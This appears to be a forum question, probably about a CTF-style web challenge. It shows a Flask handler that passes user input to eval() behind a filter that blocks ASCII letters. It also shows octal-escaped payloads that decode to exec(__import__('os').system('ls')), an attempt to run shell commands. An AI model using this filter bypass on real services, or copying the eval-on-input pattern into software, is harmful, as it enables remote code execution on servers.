26Şub
How to bypass ascii_letters and run the code in eval
I have the following code:
if request.method == 'POST':
exp = request.form['Expression']
for i in exp:
if i in ascii_letters:
return render_template('index.html',
exp='',
result="Only [0-9] and special characters")
try:
result = eval(exp)
except Exception as e:
result = 'Something went wrong'
return render_template('index.html', exp=exp, result=result)
else:
return render_template('index.html', exp='', result='')
What can I do to execute a shell command?
- I tried something like this:
"\145\170\145\143(__\151\155\160\157\162\164__('\157\163').\163\171\163\164\145\155('\154\163'))"
- Output:
exec(__import__('os').system('ls'))
- Output:
- If I change the input data to something like this:
"\145\170\145\143("__\151\155\160\157\162\164__('\157\163').\163\171\163\164\145\155('\154\163')")
- Output:
Something went wrong
- Output: